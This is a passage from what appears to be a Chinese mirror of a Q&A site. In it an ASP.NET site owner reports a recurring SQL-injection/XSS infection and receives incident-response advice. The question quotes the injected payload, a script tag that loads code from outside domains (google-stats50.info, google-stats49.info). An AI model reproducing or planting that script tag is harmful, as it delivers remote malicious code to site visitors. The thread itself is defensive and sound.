那些遇到过的问题

ASP.NET网站上的XSS攻击

use*_*719 5 sql-server asp.net sql-injection

我遇到了很大麻烦.请帮忙!!!!!!!!!!

我的网站遭到了一些恶意脚本的攻击</ title> <script src = http:// google-stats50.info/ur.php>.此脚本会自动附加到某个表的任何列.我删除了这个脚本.但几个小时后,它又重新出现在一些表格中.但这一次是</ title> <script src = http:// google-stats49.info/ur.php>.

我的客户抱怨脚本.使用的技术是ASP.NET 1.1,SQL SERVER 2005.

请帮忙.

提前致谢!!!!!!

Dan*_*ann 2

关闭该网站。您的服务器现在可能会也​​可能不会被搞砸。

您必须找出更改来自哪里 - 数据库还是文件系统

如果是数据库,那么你可能没问题,有人可能正在使用 sql 注入。设置权限,以便在找到 SQL 注入点之前,站点暂时无法更新数据库。

如果这是您的文件系统,那么您可能需要清除并重置该站点。它们就在里面,你无法摆脱它们。找到你的切入点,但这会很困难。

归档时间:

查看次数:

3124 次

最近记录:

15 年,2 月 前
解读这个XSS攻击 9
更多相关链接
相关归档
如何清除SQL Server查询缓存? 190
如何在SQL Server中一次更改多个列 127
SQL Server的连接超时 109
SQL Server从datetime中删除毫秒 48
mysql_real_escape_string()是否完全防止SQL注入? 38
在asp.net中将JSON转换为.Net对象时出错 36
如何解决找不到ContentPlaceHolder错误? 21
在与页面相同的文件夹中使用用户控件 20
同时使用DISTINCT和TOP 16
在2012年防止SQL注入 0
难疑归档
什么是"大O"符号的简单英语解释? 4851
@staticmethod和@classmethod有什么区别? 3360
如何使用JavaScript复制到剪贴板? 3131
将现有的,未提交的工作移动到Git中的新分支 2982
JavaScript切断/切片/修剪字符串中的最后一个字符 1840
对于数组,为什么a [5] == 5 [a]? 1567
何时使用struct? 1347
漂亮的git分支图 1290
将ArrayList <String>转换为String []数组 1102
如何在同一分支上的两个不同提交之间区分相同的文件? 1077